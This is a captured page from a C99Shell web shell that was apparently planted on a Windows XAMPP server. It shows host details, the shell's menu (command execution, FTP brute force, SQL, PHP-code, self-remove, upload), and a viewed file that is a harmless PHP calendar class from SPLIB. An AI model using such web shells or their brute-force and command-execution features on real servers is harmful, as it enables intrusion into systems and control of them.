!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\Xcode\SPLIB\DateTime\   drwxrwxrwx
Free 7.26 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Year.php (1.72 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* @package SPLIB
* @version $Id: Year.php,v 1.1 2003/12/12 08:06:06 kevin Exp $
*/
/**
* Define include path and include required files
*/
@define('CALENDAR_PATH','DateTime/');
require_once(
CALENDAR_PATH.'Calendar.php');
/**
* Represents a Year and builds Months
* <code>
* $year = new Year(2003);
* $year->build();
* while ( $month = $year->fetch() ) {
*   echo ( $month->thisMonth().' ' );
* }
* </code>
* @package SPLIB
*/
class Year extends Calendar
{
    
/**
    * Constructs Year
    * @param int year e.g. 2003
    * @access public
    */
    
function Year($y)
    {
        
Calendar::Calendar($y);
    }

    
/**
    * Builds the Months of the Year
    * <code>
    * $year = new Year(2003);
    * $selectedMonths = array ( new Month(2003,8) );
    * $year->build( $selectedMonths );
    * while ( $month = $year->fetch() ) {
    *   if ( $month->isSelected() )
    *       echo ( '<b>'.$month->thisMonth().'</b> ' );
    *   else
    *       echo ( $month->thisMonth().' ' );
    * }
    * </code>
    * @param array of Month objects representing selected dates (optional)
    * @param string first day of week for Month objects e.g. Sunday
    * @return boolean
    * @access public
    **/
    
function build($sDates = array(),$firstDay='Monday')
    {
        require_once(
CALENDAR_PATH.'Month.php');
        for ( 
$i 1$i <= 12$i++ ) {
            
$this->children[$i]=new Month($this->year$i$firstDay);
            foreach ( 
$sDates as $sDate ) {
                if ( 
$this->year == $sDate->thisYear()
                        && 
$i == $sDate->thisMonth() )
                    
$this->children[$i]->setSelected();
            }
        }
        return 
true;
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--